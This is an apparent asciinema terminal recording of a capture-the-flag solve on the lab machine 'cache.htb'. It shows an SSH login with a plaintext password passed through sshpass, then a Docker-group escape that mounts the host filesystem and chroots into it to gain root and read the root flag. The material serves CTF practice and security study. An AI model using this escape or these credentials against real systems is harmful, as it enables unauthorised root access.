{"version": 2, "width": 150, "height": 35, "timestamp": 1589121789, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.156965, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r\u001b]2;root@parrot: /home/prashant\u0007\u001b]1;/home/prashant\u0007"]
[0.169091, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[0.169378, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.869442, "o", "asciinema rec"]
[1.028084, "o", "\u001b[13Dsshpass -p 0n3_p1ec3 ssh luffy@cache.htb"]
[1.407417, "o", "\u001b[?1l\u001b>"]
[1.407717, "o", "\u001b[?2004l\r\r\n"]
[1.408346, "o", "\u001b]2;sshpass -p 0n3_p1ec3 ssh luffy@cache.htb\u0007"]
[1.4084, "o", "\u001b]1;sshpass\u0007"]
[6.267132, "o", "Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-99-generic x86_64)\r\n\r\n * Documentation:  https://help.ubuntu.com\r\n * Management:     https://landscape.canonical.com\r\n * Support:        https://ubuntu.com/advantage\r\n\r\n  System information as of Sun May 10 09:45:02 UTC 2020\r\n\r\n  System load:  0.01              Processes:              181\r\n  Usage of /:   73.8% of 8.06GB   Users logged in:        1\r\n  Memory usage: 11%               IP address for ens160:  10.10.10.188\r\n  Swap usage:   0%                IP address for docker0: 172.17.0.1\r\n\r\n"]
[6.269745, "o", "\r\n * Canonical Livepatch is available for installation.\r\n   - Reduce system reboots and improve kernel security. Activate at:\r\n     https://ubuntu.com/livepatch\r\n\r\n107 packages can be updated.\r\n0 updates are security updates.\r\n\r\nFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings\r\n\r\n\r\nLast login: Sun May 10 09:43:43 2020 from 10.10.14.10\r\r\n"]
[6.314746, "o", "\u001b]0;luffy@cache: ~\u0007\u001b[01;32mluffy@cache\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[7.222499, "o", "\u001b[H\u001b[2J\u001b]0;luffy@cache: ~\u0007\u001b[01;32mluffy@cache\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[8.173154, "o", "docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash"]
[8.569849, "o", "\r\n"]
[9.470746, "o", "\u001b]0;root@0faa5b6a5b56: /\u0007root@0faa5b6a5b56:/# \r\u001b[K\u001b]0;root@0faa5b6a5b56: /\u0007root@0faa5b6a5b56:/# "]
[10.657868, "o", "w"]
[10.816758, "o", "h"]
[11.037391, "o", "o"]
[11.21804, "o", "a"]
[11.343285, "o", "m"]
[11.525851, "o", "i"]
[12.02274, "o", "\r\nroot\r\n\u001b]0;root@0faa5b6a5b56: /\u0007root@0faa5b6a5b56:/# "]
[13.146626, "o", "w"]
[13.386964, "o", "c"]
[13.54701, "o", " "]
[13.927103, "o", "/"]
[14.177054, "o", "r"]
[14.42301, "o", "o"]
[14.557703, "o", "o"]
[14.902005, "o", "t"]
[15.545671, "o", "/"]
[15.949109, "o", "r"]
[16.177486, "o", "o"]
[16.287933, "o", "o"]
[16.456927, "o", "t"]
[16.666672, "o", "."]
[17.076907, "o", "t"]
[17.186988, "o", "x"]
[17.278173, "o", "t"]
[17.783006, "o", "\r\n 1  1 33 /root/root.txt\r\n\u001b]0;root@0faa5b6a5b56: /\u0007root@0faa5b6a5b56:/# "]
[19.383374, "o", "\u001b[H\u001b[2J\u001b]0;root@0faa5b6a5b56: /\u0007root@0faa5b6a5b56:/# "]
[19.713688, "o", "exit\r\n"]
[19.98529, "o", "\u001b]0;luffy@cache: ~\u0007\u001b[01;32mluffy@cache\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[20.047745, "o", "logout\r\n"]
[20.048132, "o", "Connection to cache.htb closed.\r\r\n"]
[20.050253, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[20.050582, "o", "\u001b]2;root@parrot: /home/prashant\u0007\u001b]1;/home/prashant\u0007"]
[20.063222, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[K"]
[20.063669, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[20.959316, "o", "\u001b[?2004l\r\r\n"]
